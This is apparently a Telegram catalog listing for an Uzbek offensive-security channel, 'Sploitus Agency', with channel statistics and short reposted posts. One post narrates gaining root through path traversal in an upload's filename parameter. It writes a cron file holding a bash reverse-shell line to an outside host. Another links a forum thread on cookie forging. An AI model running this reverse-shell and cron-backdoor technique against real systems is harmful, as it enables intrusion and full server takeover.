tgindex
Sploitus Agency

Sploitus Agency

Статистика
@sploitus_agencyузбекский

Assalomu aleykum ✌️ Kanalimizda: — Yangi exploitlar — Tutoriallar — PoC lar — Hujum strategiyalari — Bypasslar O'rta Osiyodagi birinchi CNA tashkiloti rahbari ! Bizdan uzoqlashmang ✌️ Kanalimiz: @sploitus_agency

Последний пост
14 авг.
Последнее чтение
14 авг.
Постов за неделю
10
Всего постов
23
Тип
открытый
Язык
узбекский
В каталоге с
13 авг.
Подписчики
693
0 за 1 дн.
Сутки
0
0,00%
Неделя
 
Месяц
 
Просмотров на пост
313
23 постов
Вовлечённость
45,2%
к подписчикам
Постов в день
1,4
всего 23
Упоминаний
2
каналов
Охват размещения
оценка
1/24сутки в ленте
227
1/48двое суток
260
1/72трое суток
280

Оценка по просмотрам недавних постов: пост набирает почти всё за первые сутки.

Посты

  • 14 авг.76из turansecurity

    Xabaringiz bor, Turan Security kiberxavfsizlik tashkiloti rasmiy CNA sifatidagi faoliyatini 2026-yil mart oyida boshlagan. Ushbu davr mobaynida biz kiberxavfsizlik tadqiqotchilari va dasturiy ta'minot ishlab chiquvchilari bilan yaqindan hamkorlik qilib, CVE dasturi talablari asosida mas'uliyatli zaifliklarni oshkor etish (Responsible Vulnerability Disclosure) jarayonini qo‘llab-quvvatladik hamda 204 ta CVE (Common Vulnerabilities and Exposures)ni muvaffaqiyatli e'lon qildik. Avgust oyida katta sakrash kuzatildi. Oyning dastlabki 13 kunida TuranSec CNA tomonidan 172 ta CVE e'lon qilingan. Bu ko'rsatkich jahondagi IBM, Red Hat, Microsoft kabi 534 ta CNA tashkilotlari orasida TOP-10 ko‘rsatkichlardan biri hisoblanadi - havola Tushunishingiz uchun bundan 2 yil oldin ham CVE bo'yicha tadqiqotchilar bir nechtani tashkil etardi. Oxirgi 6 oy ichida 50 dan ortiq mahalliy kiberxavfsizlik tadqiqotchilari dunyoning TOP kompaniyalari mahsulotlaridan yangi turdagi zaifliklarni aniqlab 204 ta CVE e'lon qilinishi katta natija hisoblanadi. Buni sohada ishlab yurganlar yaxshi bilishadi, AI rivojlanishi Kiberxavfsizlik sohasida tadqiqot yo'nalishini yanada osonlashtirdi. Biz bilan hamkorlik qilayotgan barcha tadqiqotchilarga o‘z minnatdorchiligimizni bildiramiz. Izlanishdan va o‘sishdan to‘xtamang! Biz faoliyatimizni rivojlantirish va xizmatlarimizni yanada takomillashtirishda davom etamiz. Yaqin bir necha yil ichida O‘zbekistonda minglab yangi kiberxavfsizlik tadqiqotchilari va mutaxassislari yetishib chiqishiga o‘z hissamizni qo‘shishni maqsad qilganmiz. @turansecurity | www.turansec.uz | info@turansec.uz

  • Bulani aniq mazasi joyidamas. Yoki qanaqadur boshqa paralel dunyoda yashashadi: - barg pul o'rnida o'tadi - rahmatga ijaraga uy berishadi Studentimas, part timemas, full time uchun 5 millionga senior🗿

  • 13 авг.23194из sansec

    Bulani aniq mazasi joyidamas. Yoki qanaqadur boshqa paralel dunyoda yashashadi: - barg pul o'rnida o'tadi - rahmatga ijaraga uy berishadi Studentimas, part timemas, full time uchun 5 millionga senior🗿

  • nimadir yaxshi ishlarni hidi kelyapti )

  • Node.js. Webshell befoyda. Lekin...👀 Path traversal orqali RCE olish haqida eshitganmisiz? Bug hunting vaqtida unauth upload function topib oldim. Birinchi narsa — stack tekshirdim. Node.js. Demak webshell yuklashni deyarli foydasi yo'q, ko'pchilik shu yerda…

  • 12 авг.17183из javasec

    Node.js. Webshell befoyda. Lekin...👀 Path traversal orqali RCE olish haqida eshitganmisiz? Bug hunting vaqtida unauth upload function topib oldim. Birinchi narsa — stack tekshirdim. Node.js. Demak webshell yuklashni deyarli foydasi yo'q, ko'pchilik shu yerda to'xaydi va keyingisiga o'tadi. Lekin men filename parametriga e'tibor berdim. Odatda bu parametr serverda fayl nomini belgilaydi. Sanitize qilinmagan bo'lsa — path traversal. Tekshirdim: filename=../../../../../../etc/passwd Server 200 OK javob qaytardi. Xato yo'q. Endi asosiy savol — process qaysi user bilan ishlayapti? Agar www-data bo'lsa /etc ga yoza olmayman. Root bo'lsa — boshqa gap. filename=../../../../../../etc/cron.d/backdoor file body'ga esa: * * * * * root bash -i >& /dev/tcp/x.x.x.x/4444 0>&1 Server 200 OK. Yuklandi. Endi faqat cron daemon ishlayaptimi degan savol qoldi — va u ishlayotgandi. Netcat'ni yoqib 60 soniya kutdim. connect to [attacker] from [target] uid=0(root) gid=0(root) groups=0(root) CVE kerak emas. 0day kerak emas. Webshell ham kerak emas. Faqat sanitize qilinmagan bitta parametr va root sifatida ishlaydigan bitta process. Asosiy muammo kod ichida emas — uni kim yozganida edi.🙂 Telegram📱 Linkedin 📱 Web✈️

  • logbit bilan ilk tajriba chiroyli ui aniq va tushunarli sahifalar biroz cyber vibe ) ancha yaxshi g'oya @logbit_ai jamoasiga omad hali hamma funskiyalardan foydalanib ko'rgan holatda o'z fikrlarimni yanada kengroq post qilib yozaman menimcha hammaga qiziq bo'ladi

  • https://ret2p.lt/categories/

  • 🙂 shunaqa logikani kim o'ylab topgan ekana

  • 15 mln emas undan ancha kam xa nima deymiz endi kuchli xaker ekan )

  • https://forum.duty-free.cc/threads/7884/ yarim kundan oshiq vaqt ketgan chain haqida kichik post cookie yasash haqida uncha muncha joyda data topish qiyin ))

  • 15 7|-| \/\/3 .- 8|_|5`/

  • https://thehackernews.com/2026/08/metabase-zero-day-exploited-in-wild.html xay bir maza qilishibtida endi urushmanglar )) A call to "POST /api/session/reset_password" with a 400 status code This is followed by a call to "GET /api/user/current" with a 200 status code

  • rivojlanish o'sish bor yaxshi ketyapsila yigitlar bosila ✊

  • без подписи

  • без подписи

  • 9 авг.364211из falconacademyuz

    Falcon Academy | Kiberxavfsizlik ta'lim platformasi quyidagi imkoniyatlarni yaratib beradi Brauzeringizdan turib real topshiriqlar yechasiz, zaifliklarni topasiz va haqiqiy vositalar bilan ishlaysiz. 1: Offensive va Defensive Security ka'bi narsalarni o'qib amalda sinab ko'rib o'rganasiz 2: Nazariy testlar va amaliy topshiriqlar har bir bo'lim uchun 3: Har bir bo'limni tugatganingiz uchun sertificate beriladi 4: Kiberxavfsizlikni to'g'ri ketma ketlikda o'rganishingiz uchun yo'l xaritasi chizib beriladi 5: Amaliy topshiriqlarni bajarishingiz uchun 200+ ortiq turli xil bo'limlar bo'yicha labaratoriyalar mavjud 💸 Kiberxavfsizlikni amalda o'rganishingiz uchun www.falcon-academy.uz

  • без подписи

  • 7 авг.22683из ayubcyber

    без подписи

  • без подписи